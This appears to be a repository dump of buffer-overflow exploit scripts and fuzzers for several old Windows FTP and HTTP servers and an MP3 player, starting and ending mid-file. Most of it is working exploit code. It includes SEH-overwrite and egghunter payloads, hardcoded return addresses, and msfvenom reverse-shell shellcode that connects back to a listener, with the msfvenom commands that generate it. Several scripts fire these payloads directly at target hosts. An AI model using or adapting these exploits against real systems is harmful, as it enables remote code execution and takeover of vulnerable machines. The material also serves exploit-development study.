x98\x46\x4c\xe0\x48\x27\x3c\x88\x82\xa8\x63\xa8\xad\x62\x0c\x43\x54\xe5\xf3\x3c\x57\xe4\x9b\x3e\x57\x17\x00\xb6\xb1\x7d\xa8\x9e\x6a\xea\x51\xbb\xe0\x8b\x9e\x11\x8d\x8c\x15\x96\x72\x42\xde\xd3\x60\x33\x2e\xae\xda\x92\x31\x04\x72\x78\xa3\xc3\x82\xf7\xd8\x5b\xd5\x50\x2e\x92\xb3\x4c\x09\x0c\xa1\x8c\xcf\x77\x61\x4b\x2c\x79\x68\x1e\x08\x5d\x7a\xe6\x91\xd9\x2e\xb6\xc7\xb7\x98\x70\xbe\x79\x72\x2b\x6d\xd0\x12\xaa\x5d\xe3\x64\xb3\x8b\x95\x88\x02\x62\xe0\xb7\xab\xe2\xe4\xc0\xd1\x92\x0b\x1b\x52\xa2\x41\x01\xf3\x2b\x0c\xd0\x41\x36\xaf\x0f\x85\x4f\x2c\xa5\x76\xb4\x2c\xcc\x73\xf0\xea\x3d\x0e\x69\x9f\x41\xbd\x8a\x8a") 8 | 9 | egg = "USER "+"kalikali"+shell +"\r\n"; 10 | 11 | egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x6b\x61\x6c\x69\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" 12 | 13 | offset = "A" * (801-4-len(egghunter)) + egghunter 14 | nseh = "\x90\x90\xeb\x80" #jmp 128 byte 15 | seh = "\x26\x42\x41\x00" #00414226 pop pop ret 16 | 17 | buffer = offset + nseh + seh 
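s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((host,port))
# Second session plants the egg (USER kalikali + shellcode) in the server's
# memory. It is deliberately left open so the egg stays resident while the
# egghunter delivered on the first session searches for it -- do not "tidy"
# this by closing s2.
s2 = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s2.connect((host,port))
s2.recv(1024)
s2.send(egg)
# First session triggers the SEH overwrite through the PASS argument.
s.recv(1024)
s.send("USER anonymous\r\n")
s.recv(1024)
s.send("PASS "+buffer+"\r\n")
s.close()
-------------------------------------------------------------------------------- /FreeFTP 1.0.8/fuzz.py: --------------------------------------------------------------------------------
import socket

def main():
    """Send PASS arguments of growing length to the FTP server and print each
    step, so the crashing length can be read off the last line printed before
    the server stops answering.

    Probe lengths are 1, 20, 120, 220, ... 2920 (31 probes); each probe uses a
    fresh connection and ends with QUIT.
    """
    ip = '192.168.1.9'
    port = 21
    username = 'anonymous'
    password = 'ftp'

    buffer = ["A"]
    counter = 20
    commands = ["PASS"]

    while len(buffer) <= 30:
        buffer.append("A" * counter)
        counter = counter + 100

    for command in commands:
        for payload in buffer:
            print("Fuzzing " + command + " with length: " + str(len(payload)))

            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.connect((ip, port))
            sock.recv(1024)
            if command == 'PASS':
                # PASS only needs a preceding USER.
                sock.send('USER ' + username + '\r\n')
                sock.recv(1024)
            elif command != 'USER' and command != 'PASS':
                # Any other command needs a full login first. The original
                # compared with `is not`, which tests object identity rather
                # than string equality.
                sock.send('USER ' + username + '\r\n')
                sock.recv(1024)
                sock.send('PASS ' + password + '\r\n')
                sock.recv(1024)
            sock.send(command + ' ' + payload + '\r\n')
            sock.recv(1024)
            sock.send('QUIT\r\n')
            sock.close()

if __name__ == '__main__':
    main()
-------------------------------------------------------------------------------- /FreeFloat/exploit.py: --------------------------------------------------------------------------------
#!/usr/bin/python
import sys
import socket

# eip 77E9F8F7 kernel32 dll -- the EIP overwrite; a NOP sled and the shellcode
# follow it directly, so it is presumably a JMP ESP. Confirm in a debugger
# before reusing the address on a different OS/service pack.
# bad \x00\x0A\x0D -- bad chars for this target, also excluded from msfvenom below

# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.9 LPORT=9696 -f python -b \x00\x0A\x0D --platform windows -a x86 -e x86/shikata_ga_nai EXITFUNC=thread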
10 | 11 | buf = "" 12 | buf += "\xda\xd4\xd9\x74\x24\xf4\xbf\x2c\xc2\x29\xf1\x5d\x29" 13 | buf += "\xc9\xb1\x52\x31\x7d\x17\x83\xc5\x04\x03\x51\xd1\xcb" 14 | buf += "\x04\x55\x3d\x89\xe7\xa5\xbe\xee\x6e\x40\x8f\x2e\x14" 15 | buf += "\x01\xa0\x9e\x5e\x47\x4d\x54\x32\x73\xc6\x18\x9b\x74" 16 | buf += "\x6f\x96\xfd\xbb\x70\x8b\x3e\xda\xf2\xd6\x12\x3c\xca" 17 | buf += "\x18\x67\x3d\x0b\x44\x8a\x6f\xc4\x02\x39\x9f\x61\x5e" 18 | buf += "\x82\x14\x39\x4e\x82\xc9\x8a\x71\xa3\x5c\x80\x2b\x63" 19 | buf += "\x5f\x45\x40\x2a\x47\x8a\x6d\xe4\xfc\x78\x19\xf7\xd4" 20 | buf += "\xb0\xe2\x54\x19\x7d\x11\xa4\x5e\xba\xca\xd3\x96\xb8" 21 | buf += "\x77\xe4\x6d\xc2\xa3\x61\x75\x64\x27\xd1\x51\x94\xe4" 22 | buf += "\x84\x12\x9a\x41\xc2\x7c\xbf\x54\x07\xf7\xbb\xdd\xa6" 23 | buf += "\xd7\x4d\xa5\x8c\xf3\x16\x7d\xac\xa2\xf2\xd0\xd1\xb4" 24 | buf += "\x5c\x8c\x77\xbf\x71\xd9\x05\xe2\x1d\x2e\x24\x1c\xde" 25 | buf += "\x38\x3f\x6f\xec\xe7\xeb\xe7\x5c\x6f\x32\xf0\xa3\x5a" 26 | buf += "\x82\x6e\x5a\x65\xf3\xa7\x99\x31\xa3\xdf\x08\x3a\x28" 27 | buf += "\x1f\xb4\xef\xff\x4f\x1a\x40\x40\x3f\xda\x30\x28\x55" 28 | buf += "\xd5\x6f\x48\x56\x3f\x18\xe3\xad\xa8\xe7\x5c\xac\x21" 29 | buf += "\x80\x9e\xae\x14\xb0\x16\x48\x3c\x20\x7f\xc3\xa9\xd9" 30 | buf += "\xda\x9f\x48\x25\xf1\xda\x4b\xad\xf6\x1b\x05\x46\x72" 31 | buf += "\x0f\xf2\xa6\xc9\x6d\x55\xb8\xe7\x19\x39\x2b\x6c\xd9" 32 | buf += "\x34\x50\x3b\x8e\x11\xa6\x32\x5a\x8c\x91\xec\x78\x4d" 33 | buf += "\x47\xd6\x38\x8a\xb4\xd9\xc1\x5f\x80\xfd\xd1\x99\x09" 34 | buf += "\xba\x85\x75\x5c\x14\x73\x30\x36\xd6\x2d\xea\xe5\xb0" 35 | buf += "\xb9\x6b\xc6\x02\xbf\x73\x03\xf5\x5f\xc5\xfa\x40\x60" 36 | buf += "\xea\x6a\x45\x19\x16\x0b\xaa\xf0\x92\x2b\x49\xd0\xee" 37 | buf += "\xc3\xd4\xb1\x52\x8e\xe6\x6c\x90\xb7\x64\x84\x69\x4c" 38 | buf += "\x74\xed\x6c\x08\x32\x1e\x1d\x01\xd7\x20\xb2\x22\xf2" 39 | 40 | 41 | buffer = "A"*247 42 | buffer += "\xF7\xF8\xE9\x77" 43 | buffer += "\x90" * 30 44 | buffer += buf 45 | 46 | s= socket.socket(socket.AF_INET, 
socket.SOCK_STREAM) 47 | connect=s.connect(('192.168.1.10',21)) 48 | 49 | s.recv(1024) 50 | s.send('USER kalisa\r\n') 51 | s.recv(1024) 52 | s.send('PASS kalisa\r\n') 53 | s.recv(1024) 54 | s.send('MKD '+buffer+'\r\n') 55 | s.recv(1024) 56 | s.send('QUIT\r\n') 57 | s.close() 58 | -------------------------------------------------------------------------------- /KarjaSoft Sami FTP Server 2.0.1/boofuzz.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | from boofuzz import * 3 | from boofuzz import pedrpc 4 | 5 | host = "192.168.1.9" 6 | port = 21 7 | 8 | def main(): 9 | session = Session(target = Target(connection = SocketConnection(host, port, proto='tcp'))) 10 | 11 | s_initialize("user") 12 | s_static("USER") 13 | s_delim(" ") 14 | s_static("anonymous") 15 | s_static("\r\n") 16 | 17 | s_initialize("pass") 18 | s_static("PASS") 19 | s_delim(" ") 20 | s_string("FUZZ") 21 | s_static("\r\n") 22 | 23 | session.connect(s_get("user")) 24 | session.connect(s_get("user"), s_get("pass")) 25 | 26 | session.fuzz() 27 | if __name__ == "__main__": 28 | main() 29 | -------------------------------------------------------------------------------- /KarjaSoft Sami FTP Server 2.0.1/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import sys 3 | import socket 4 | 5 | host = "192.168.1.9" 6 | port = 21 7 | 8 | # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.8 LPORT=6666 -f c -b '\x00\x0a\x0d' --platform windows -a x86 -v shellcode -e x86/alpha_mixed EXITFUNC=thread 9 | shellcode = ("\x89\xe5\xd9\xd0\xd9\x75\xf4\x5b\x53\x59\x49\x49\x49\x49\x49" 10 | "\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a" 11 | "\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32" 12 | "\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" 13 | "\x79\x6c\x6d\x38\x4d\x52\x63\x30\x37\x70\x53\x30\x71\x70\x6b" 14 | 
"\x39\x48\x65\x35\x61\x6f\x30\x75\x34\x6e\x6b\x72\x70\x34\x70" 15 | "\x4e\x6b\x53\x62\x74\x4c\x4c\x4b\x50\x52\x55\x44\x6c\x4b\x72" 16 | "\x52\x35\x78\x36\x6f\x6c\x77\x50\x4a\x61\x36\x65\x61\x69\x6f" 17 | "\x6c\x6c\x65\x6c\x51\x71\x53\x4c\x65\x52\x34\x6c\x35\x70\x4a" 18 | "\x61\x58\x4f\x44\x4d\x77\x71\x5a\x67\x4a\x42\x49\x62\x52\x72" 19 | "\x36\x37\x6c\x4b\x72\x72\x34\x50\x6c\x4b\x42\x6a\x77\x4c\x4e" 20 | "\x6b\x62\x6c\x74\x51\x34\x38\x78\x63\x63\x78\x55\x51\x6b\x61" 21 | "\x30\x51\x4c\x4b\x56\x39\x77\x50\x73\x31\x59\x43\x4c\x4b\x52" 22 | "\x69\x52\x38\x59\x73\x34\x7a\x62\x69\x4c\x4b\x77\x44\x4e\x6b" 23 | "\x45\x51\x4e\x36\x36\x51\x69\x6f\x4e\x4c\x7a\x61\x58\x4f\x66" 24 | "\x6d\x77\x71\x4b\x77\x64\x78\x59\x70\x50\x75\x59\x66\x76\x63" 25 | "\x53\x4d\x59\x68\x47\x4b\x73\x4d\x44\x64\x31\x65\x6b\x54\x63" 26 | "\x68\x6e\x6b\x46\x38\x67\x54\x53\x31\x6e\x33\x45\x36\x4e\x6b" 27 | "\x54\x4c\x72\x6b\x4e\x6b\x33\x68\x75\x4c\x67\x71\x59\x43\x4e" 28 | "\x6b\x75\x54\x4e\x6b\x65\x51\x68\x50\x6f\x79\x73\x74\x46\x44" 29 | "\x54\x64\x71\x4b\x53\x6b\x50\x61\x63\x69\x32\x7a\x43\x61\x4b" 30 | "\x4f\x4d\x30\x51\x4f\x63\x6f\x52\x7a\x6c\x4b\x55\x42\x38\x6b" 31 | "\x4e\x6d\x31\x4d\x55\x38\x57\x43\x67\x42\x37\x70\x43\x30\x70" 32 | "\x68\x52\x57\x72\x53\x66\x52\x73\x6f\x50\x54\x50\x68\x50\x4c" 33 | "\x62\x57\x65\x76\x33\x37\x49\x6f\x39\x45\x4c\x78\x6c\x50\x35" 34 | "\x51\x45\x50\x75\x50\x74\x69\x4f\x34\x72\x74\x70\x50\x43\x58" 35 | "\x74\x69\x4f\x70\x52\x4b\x65\x50\x69\x6f\x48\x55\x30\x50\x30" 36 | "\x50\x42\x70\x76\x30\x47\x30\x72\x70\x61\x50\x30\x50\x53\x58" 37 | "\x39\x7a\x56\x6f\x4b\x6f\x59\x70\x69\x6f\x6e\x35\x4f\x67\x30" 38 | "\x6a\x45\x55\x50\x68\x69\x50\x59\x38\x37\x71\x66\x68\x32\x48" 39 | "\x57\x72\x67\x70\x55\x4a\x66\x6a\x6b\x39\x6a\x46\x63\x5a\x32" 40 | "\x30\x56\x36\x53\x67\x65\x38\x6f\x69\x6d\x75\x43\x44\x50\x61" 41 | "\x4b\x4f\x6b\x65\x4c\x45\x6f\x30\x51\x64\x44\x4c\x49\x6f\x70" 42 | "\x4e\x47\x78\x32\x55\x4a\x4c\x62\x48\x7a\x50\x4e\x55\x4c\x62" 43 | 
"\x46\x36\x4b\x4f\x78\x55\x53\x58\x71\x73\x50\x6d\x75\x34\x47" 44 | "\x70\x4f\x79\x6a\x43\x71\x47\x42\x77\x42\x77\x64\x71\x48\x76" 45 | "\x30\x6a\x32\x32\x56\x39\x50\x56\x49\x72\x49\x6d\x35\x36\x7a" 46 | "\x67\x70\x44\x57\x54\x35\x6c\x45\x51\x45\x51\x6e\x6d\x61\x54" 47 | "\x74\x64\x46\x70\x69\x56\x55\x50\x50\x44\x63\x64\x32\x70\x31" 48 | "\x46\x62\x76\x53\x66\x63\x76\x61\x46\x62\x6e\x72\x76\x33\x66" 49 | "\x53\x63\x30\x56\x52\x48\x30\x79\x78\x4c\x47\x4f\x4f\x76\x4b" 50 | "\x4f\x4b\x65\x4b\x39\x6d\x30\x62\x6e\x36\x36\x42\x66\x6b\x4f" 51 | "\x50\x30\x30\x68\x37\x78\x6d\x57\x47\x6d\x33\x50\x69\x6f\x68" 52 | "\x55\x6f\x4b\x6b\x50\x75\x4d\x75\x7a\x74\x4a\x43\x58\x39\x36" 53 | "\x4f\x65\x6f\x4d\x6f\x6d\x69\x6f\x4b\x65\x55\x6c\x76\x66\x61" 54 | "\x6c\x66\x6a\x6f\x70\x69\x6b\x49\x70\x43\x45\x54\x45\x6d\x6b" 55 | "\x42\x67\x52\x33\x43\x42\x52\x4f\x63\x5a\x63\x30\x50\x53\x69" 56 | "\x6f\x38\x55\x41\x41") 57 | 58 | 59 | 60 | offset = "A"*(600-4) 61 | #nseh = "B"*4 62 | nseh = '\x40\x40\x75\x04' # short jmp 63 | seh = "\x69\x9c\x01\x10" # tmp0.dll pop pop ret 0x10019c69 64 | junk = "D"*30 65 | 66 | buffer = offset + nseh + seh + "\x90"*10 + shellcode 67 | 68 | s= socket.socket(socket.AF_INET, socket.SOCK_STREAM) 69 | connect=s.connect((host,port)) 70 | 71 | s.send('USER ' + buffer + '\r\n') 72 | s.recv(1024) 73 | s.send('PASS ' + buffer + '\r\n') 74 | s.recv(1024) 75 | s.close() 76 | -------------------------------------------------------------------------------- /KnFTP Server 1.0.0/exploit.py: -------------------------------------------------------------------------------- 1 | import sys,socket 2 | 3 | host = '192.168.1.9' 4 | port = 21 5 | 6 | jmp_esp = "\x53\x93\x42\x7E" #user32.dll 7e429353 7 | 8 | egg = "w00tw00t" 9 | egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" 10 | 11 | padding = "\x90" * 15 12 | 13 | # shellcode 227 bytes 14 | shellcode = "" 15 | shellcode += 
"\xb8\xe8\xaa\x5e\xc0\xdb\xd6\xd9\x74\x24\xf4\x5b\x31\xc9\xb1" 16 | shellcode += "\x33\x31\x43\x12\x03\x43\x12\x83\x03\x56\xbc\x35\x2f\x4f\xc8" 17 | shellcode += "\xb6\xcf\x90\xab\x3f\x2a\xa1\xf9\x24\x3f\x90\xcd\x2f\x6d\x19" 18 | shellcode += "\xa5\x62\x85\xaa\xcb\xaa\xaa\x1b\x61\x8d\x85\x9c\x47\x11\x49" 19 | shellcode += "\x5e\xc9\xed\x93\xb3\x29\xcf\x5c\xc6\x28\x08\x80\x29\x78\xc1" 20 | shellcode += "\xcf\x98\x6d\x66\x8d\x20\x8f\xa8\x9a\x19\xf7\xcd\x5c\xed\x4d" 21 | shellcode += "\xcf\x8c\x5e\xd9\x87\x34\xd4\x85\x37\x45\x39\xd6\x04\x0c\x36" 22 | shellcode += "\x2d\xfe\x8f\x9e\x7f\xff\xbe\xde\x2c\x3e\x0f\xd3\x2d\x06\xb7" 23 | shellcode += "\x0c\x58\x7c\xc4\xb1\x5b\x47\xb7\x6d\xe9\x5a\x1f\xe5\x49\xbf" 24 | shellcode += "\x9e\x2a\x0f\x34\xac\x87\x5b\x12\xb0\x16\x8f\x28\xcc\x93\x2e" 25 | shellcode += "\xff\x45\xe7\x14\xdb\x0e\xb3\x35\x7a\xea\x12\x49\x9c\x52\xca" 26 | shellcode += "\xef\xd6\x70\x1f\x89\xb4\x1e\xde\x1b\xc3\x67\xe0\x23\xcc\xc7" 27 | shellcode += "\x89\x12\x47\x88\xce\xaa\x82\xed\x21\xe1\x8f\x47\xaa\xac\x45" 28 | shellcode += "\xda\xb7\x4e\xb0\x18\xce\xcc\x31\xe0\x35\xcc\x33\xe5\x72\x4a" 29 | shellcode += "\xaf\x97\xeb\x3f\xcf\x04\x0b\x6a\xac\xcb\x9f\xf6\x1d\x6e\x18" 30 | shellcode += "\x9c\x61" 31 | 32 | offset = "A"*(284-8-len(shellcode)) 33 | payload = offset + egg + shellcode + jmp_esp + padding + egghunter 34 | 35 | buff = "USER " + payload + "\r\n\r\n" 36 | 37 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 38 | s.connect((host,port)) 39 | s.send(buff) 40 | s.recv(1024) 41 | s.close() 42 | -------------------------------------------------------------------------------- /Kolibri v2.0 HTTP Server/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import os,sys,socket 4 | # JMP ESP 0x7e429353 5 | 6 | egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x6b\x61\x6c\x69\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" 7 | 8 | # offset: 515 9 | stage1 
= "A"*(515-32-7) + egghunter + "A" * 7 + "\x53\x93\x42\x7e" + "\xeb\xce" 10 | 11 | shellcode = "" 12 | shellcode += "\x89\xe3\xdb\xc1\xd9\x73\xf4\x5e\x56\x59\x49\x49" 13 | shellcode += "\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43" 14 | shellcode += "\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30" 15 | shellcode += "\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30" 16 | shellcode += "\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" 17 | shellcode += "\x69\x6c\x4d\x38\x4d\x52\x55\x50\x35\x50\x45\x50" 18 | shellcode += "\x43\x50\x4d\x59\x69\x75\x34\x71\x4f\x30\x55\x34" 19 | shellcode += "\x6e\x6b\x76\x30\x34\x70\x4e\x6b\x61\x42\x74\x4c" 20 | shellcode += "\x4c\x4b\x62\x72\x46\x74\x4c\x4b\x32\x52\x55\x78" 21 | shellcode += "\x46\x6f\x38\x37\x32\x6a\x57\x56\x34\x71\x6b\x4f" 22 | shellcode += "\x6e\x4c\x37\x4c\x30\x61\x31\x6c\x76\x62\x54\x6c" 23 | shellcode += "\x35\x70\x49\x51\x4a\x6f\x44\x4d\x47\x71\x4a\x67" 24 | shellcode += "\x49\x72\x7a\x52\x31\x42\x72\x77\x6e\x6b\x63\x62" 25 | shellcode += "\x52\x30\x6e\x6b\x63\x7a\x35\x6c\x4e\x6b\x32\x6c" 26 | shellcode += "\x52\x31\x64\x38\x78\x63\x61\x58\x46\x61\x6b\x61" 27 | shellcode += "\x70\x51\x4c\x4b\x33\x69\x47\x50\x63\x31\x58\x53" 28 | shellcode += "\x6c\x4b\x50\x49\x42\x38\x49\x73\x45\x6a\x32\x69" 29 | shellcode += "\x4e\x6b\x47\x44\x4e\x6b\x36\x61\x6b\x66\x75\x61" 30 | shellcode += "\x79\x6f\x4e\x4c\x6f\x31\x6a\x6f\x74\x4d\x57\x71" 31 | shellcode += "\x79\x57\x50\x38\x69\x70\x74\x35\x6b\x46\x36\x63" 32 | shellcode += "\x53\x4d\x6a\x58\x65\x6b\x63\x4d\x34\x64\x51\x65" 33 | shellcode += "\x4b\x54\x52\x78\x4e\x6b\x46\x38\x46\x44\x65\x51" 34 | shellcode += "\x39\x43\x62\x46\x6e\x6b\x34\x4c\x42\x6b\x6e\x6b" 35 | shellcode += "\x63\x68\x37\x6c\x43\x31\x78\x53\x6c\x4b\x66\x64" 36 | shellcode += "\x6e\x6b\x36\x61\x4e\x30\x4c\x49\x37\x34\x67\x54" 37 | shellcode += "\x55\x74\x53\x6b\x71\x4b\x50\x61\x56\x39\x42\x7a" 38 | shellcode += "\x73\x61\x59\x6f\x59\x70\x53\x6f\x51\x4f\x30\x5a" 39 | shellcode += 
"\x4e\x6b\x65\x42\x6a\x4b\x4c\x4d\x73\x6d\x53\x58" 40 | shellcode += "\x47\x43\x65\x62\x63\x30\x47\x70\x65\x38\x34\x37" 41 | shellcode += "\x73\x43\x64\x72\x53\x6f\x31\x44\x33\x58\x50\x4c" 42 | shellcode += "\x71\x67\x77\x56\x55\x57\x69\x6f\x5a\x75\x6f\x48" 43 | shellcode += "\x6c\x50\x33\x31\x73\x30\x77\x70\x71\x39\x6f\x34" 44 | shellcode += "\x71\x44\x46\x30\x65\x38\x77\x59\x4b\x30\x50\x6b" 45 | shellcode += "\x57\x70\x59\x6f\x78\x55\x30\x50\x56\x30\x32\x70" 46 | shellcode += "\x32\x70\x63\x70\x62\x70\x61\x50\x50\x50\x52\x48" 47 | shellcode += "\x4b\x5a\x46\x6f\x59\x4f\x59\x70\x69\x6f\x68\x55" 48 | shellcode += "\x6f\x67\x30\x6a\x56\x65\x63\x58\x69\x50\x39\x38" 49 | shellcode += "\x57\x71\x63\x34\x73\x58\x44\x42\x45\x50\x46\x7a" 50 | shellcode += "\x57\x7a\x6f\x79\x49\x76\x61\x7a\x36\x70\x36\x36" 51 | shellcode += "\x66\x37\x75\x38\x4c\x59\x4c\x65\x61\x64\x53\x51" 52 | shellcode += "\x4b\x4f\x4e\x35\x6e\x65\x59\x50\x54\x34\x34\x4c" 53 | shellcode += "\x6b\x4f\x32\x6e\x37\x78\x61\x65\x68\x6c\x31\x78" 54 | shellcode += "\x5a\x50\x38\x35\x4e\x42\x36\x36\x79\x6f\x78\x55" 55 | shellcode += "\x53\x58\x43\x53\x50\x6d\x51\x74\x65\x50\x6f\x79" 56 | shellcode += "\x48\x63\x51\x47\x31\x47\x36\x37\x54\x71\x58\x76" 57 | shellcode += "\x63\x5a\x56\x72\x46\x39\x52\x76\x58\x62\x69\x6d" 58 | shellcode += "\x43\x56\x4a\x67\x77\x34\x56\x44\x47\x4c\x56\x61" 59 | shellcode += "\x75\x51\x6e\x6d\x72\x64\x55\x74\x72\x30\x79\x56" 60 | shellcode += "\x53\x30\x63\x74\x36\x34\x50\x50\x52\x76\x53\x66" 61 | shellcode += "\x56\x36\x51\x56\x73\x66\x32\x6e\x42\x76\x70\x56" 62 | shellcode += "\x31\x43\x71\x46\x42\x48\x70\x79\x5a\x6c\x67\x4f" 63 | shellcode += "\x4e\x66\x49\x6f\x6a\x75\x4f\x79\x49\x70\x50\x4e" 64 | shellcode += "\x66\x36\x31\x56\x59\x6f\x66\x50\x43\x58\x63\x38" 65 | shellcode += "\x6f\x77\x57\x6d\x75\x30\x79\x6f\x4e\x35\x4f\x4b" 66 | shellcode += "\x68\x70\x6f\x45\x4c\x62\x33\x66\x53\x58\x4f\x56" 67 | shellcode += "\x4e\x75\x6d\x6d\x4f\x6d\x4b\x4f\x69\x45\x37\x4c" 68 | shellcode 
+= "\x66\x66\x61\x6c\x55\x5a\x6b\x30\x6b\x4b\x59\x70" 69 | shellcode += "\x53\x45\x77\x75\x4d\x6b\x70\x47\x64\x53\x74\x32" 70 | shellcode += "\x50\x6f\x43\x5a\x77\x70\x43\x63\x59\x6f\x4e\x35" 71 | shellcode += "\x41\x41" 72 | 73 | 74 | stage2 = "kalikali" + shellcode # 6b616c69 75 | 76 | buffer = ( 77 | "HEAD /" + stage1 + " HTTP/1.1\r\n" 78 | "Host: 192.168.1.3:8080\r\n" 79 | "User-Agent: " + stage2 + "\r\n" 80 | "Keep-Alive: 115\r\n" 81 | "Connection: keep-alive\r\n\r\n") 82 | 83 | ip = "192.168.1.3" 84 | port = 8080 85 | 86 | print "[*] Trying to connect" 87 | s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) 88 | s.connect((ip,port)) 89 | s.send(buffer) 90 | print "[*] Payload sent" 91 | s.close() 92 | -------------------------------------------------------------------------------- /Kolibri v2.0 HTTP Server/fuzz: -------------------------------------------------------------------------------- 1 | GET /favicon.ico HTTP/1.1 2 | Host: 192.168.1.10:8081 3 | Connection: keep-alive 4 | User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36 5 | Accept: */* 6 | Referer: http://localhost:8081/ 7 | Accept-Encoding: gzip, deflate, sdch 8 | Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.6,en;q=0.4 9 | 10 | python boo-gen.py kolibri.txt --get 11 | 12 | python request.py 13 | -------------------------------------------------------------------------------- /Millenium MP3 Studio/crash.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | file = "kalisa.mpf" 4 | 5 | buffer = "http://" + "A" * 5000 6 | 7 | f = open(file,'w') 8 | f.write(buffer) 9 | f.close() 10 | -------------------------------------------------------------------------------- /Millenium MP3 Studio/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | file = "kalisa.mpf" 4 | 5 | #buffer = "A"*4112+"B"*4+"C"*4 6 | 7 | # nseh (4) 
+ seh (4) +other (8) = 16 8 | # other (8) + hole (4) + other (4) = 16 9 | # start of shellcode = 16 bytes 10 | 11 | # 2 null bytes from nseh (2) + 4 seh (4) + other (8) + 16 next row (16) = 30 bytes 12 | 13 | # \xeb\x1e means jmp 30 bytes which will be in nseh for 2 bytes 14 | 15 | offset = "http://" + "A" * 4105 16 | nextSEH = "\xeb\x1e\x90\x90" # jmp 30 bytes 17 | SEH = "\xAE\x03\x01\x10" # pop-pop-ret from xaudio.dll 18 | nops = "\x90" * 24 # 24 bytes nop sled 19 | 20 | # msfpayload windows/exec CMD=calc.exe EXITFUNC=seh R | msfencode -b '\x00\x0a\x0d' -t perl 21 | # [*] x86/shikata_ga_nai succeeded with size 227 (iteration=1) 22 | 23 | calc = ("\xbb\x34\x46\x73\x3a\xda\xd2\xd9\x74\x24\xf4\x5a\x31\xc9" + 24 | "\xb1\x33\x31\x5a\x12\x83\xea\xfc\x03\x6e\x48\x91\xcf\x72" + 25 | "\xbc\xdc\x30\x8a\x3d\xbf\xb9\x6f\x0c\xed\xde\xe4\x3d\x21" + 26 | "\x94\xa8\xcd\xca\xf8\x58\x45\xbe\xd4\x6f\xee\x75\x03\x5e" + 27 | "\xef\xbb\x8b\x0c\x33\xdd\x77\x4e\x60\x3d\x49\x81\x75\x3c" + 28 | "\x8e\xff\x76\x6c\x47\x74\x24\x81\xec\xc8\xf5\xa0\x22\x47" + 29 | "\x45\xdb\x47\x97\x32\x51\x49\xc7\xeb\xee\x01\xff\x80\xa9" + 30 | "\xb1\xfe\x45\xaa\x8e\x49\xe1\x19\x64\x48\x23\x50\x85\x7b" + 31 | "\x0b\x3f\xb8\xb4\x86\x41\xfc\x72\x79\x34\xf6\x81\x04\x4f" + 32 | "\xcd\xf8\xd2\xda\xd0\x5a\x90\x7d\x31\x5b\x75\x1b\xb2\x57" + 33 | "\x32\x6f\x9c\x7b\xc5\xbc\x96\x87\x4e\x43\x79\x0e\x14\x60" + 34 | "\x5d\x4b\xce\x09\xc4\x31\xa1\x36\x16\x9d\x1e\x93\x5c\x0f" + 35 | "\x4a\xa5\x3e\x45\x8d\x27\x45\x20\x8d\x37\x46\x02\xe6\x06" + 36 | "\xcd\xcd\x71\x97\x04\xaa\x80\x66\x95\x26\x14\xd1\x4c\x0b" + 37 | "\x78\xe2\xba\x4f\x85\x61\x4f\x2f\x72\x79\x3a\x2a\x3e\x3d" + 38 | "\xd6\x46\x2f\xa8\xd8\xf5\x50\xf9\xba\x98\xc2\x61\x13\x3f" + 39 | "\x63\x03\x6b") 40 | 41 | #shellcode = "\xcc\xcc\xcc\xcc" 42 | 43 | buffer = offset + nextSEH + SEH + nops + calc 44 | 45 | f = open(file,'w') 46 | f.write(buffer) 47 | f.close() 48 | -------------------------------------------------------------------------------- /Minialic 
HTTP/boofuzz.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # Designed for use with boofuzz v0.0.9 3 | from boofuzz import * 4 | 5 | 6 | def main(): 7 | session = Session( 8 | target=Target( 9 | connection=SocketConnection("192.168.1.10", 8080, proto='tcp') 10 | ), 11 | ) 12 | 13 | s_initialize(name="Request") 14 | with s_block("Request-Line"): 15 | s_group("Method", ["GET"]) 16 | s_delim(" ", name='space-1',fuzzable=False) 17 | s_string("/", name='Request-URI', fuzzable = False) 18 | s_delim(" ", name='space-2',fuzzable=False) 19 | s_string(" ", fuzzable=False) 20 | s_string("HTTP/1.1", name='HTTP-Version', fuzzable = False) 21 | s_delim("\r\n", name='return-1', fuzzable = False) 22 | s_string("Host:", name="Host", fuzzable = False) 23 | s_delim(" ", name="space-3", fuzzable = False) 24 | s_string("192.168.1.10:8080", name="Host-Value") 25 | s_delim("\r\n", name="return-2", fuzzable = False) 26 | s_string("Connection:", name="Connection", fuzzable = False) 27 | s_delim(" ", name="space-4", fuzzable = False) 28 | s_string("keep-alive", name="Connection-Value", fuzzable = False) 29 | s_delim("\r\n", 